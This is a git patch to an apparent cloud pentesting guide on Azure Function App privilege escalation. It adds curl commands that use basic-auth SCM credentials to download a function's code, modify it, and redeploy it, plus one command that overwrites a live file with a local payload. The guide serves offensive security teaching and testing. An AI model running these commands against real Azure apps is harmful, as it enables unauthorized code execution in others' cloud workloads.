From 7e4c12b7ff9b2e7ae2928e6d6989674bfaf6a2a0 Mon Sep 17 00:00:00 2001
From: Fudgedotdotdot <28399056+Fudgedotdotdot@users.noreply.github.com>
Date: Wed, 10 Jun 2026 14:33:48 +0200
Subject: [PATCH] Clarified Microsoft.Web/sites/publishxml/action ,
 Microsoft.Web/sites/basicPublishingCredentialsPolicies/write for functionapps

---
 .../az-functions-app-privesc.md               | 36 ++++++++++++++++---
 1 file changed, 32 insertions(+), 4 deletions(-)

diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
index 401adfe4d3..c007144daa 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -357,12 +357,40 @@ Then, you can access with these **basic auth credentials to the SCM URL** of you
 curl -u '<username>:<password>' \
     https://<app-name>.scm.azurewebsites.net/api/settings -v
 
-# Deploy code to the funciton
-zip function_app.zip function_app.py # Your code in function_app.py
-curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
-    https://<app-name>.scm.azurewebsites.net/api/zipdeploy
 ```
 
+You can download, modify and upload new function code :
+
+
+```bash
+# download
+curl -u '<username>:<password>'  -X GET \
+  https://<app-name>.scm.azurewebsites.net/api/zip/site/wwwroot/ \
+  -o current_function_code.zip
+  
+unzip current_function_code.zip -d updated_code/
+cd updated_code/
+#... modify the function code 
+zip -r ../updated_function_app.zip .
+cd ../
+
+# upload
+curl -u '<username>:<password>' https://<app-name>.scm.azurewebsites.net/api/zipdeploy -X POST --data-binary @updated_function_app.zip -v
+```
+
+You can even upload a specific file :
+
+```bash
+curl -u '<username>:<password>' \
+  -X PUT \
+  -H "Content-Type: application/javascript" \
+  -H "If-Match: *" \
+  --data-binary "@./my_local_payload.js" \
+  "https://<app-name>.scm.azurewebsites.net/api/vfs/site/wwwroot/hello-world/index.js" # example NodeJS file
+```
+
+
+
 _Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
 
 You can also access the web page from `https://<app-name>.scm.azurewebsites.net/BasicAuth`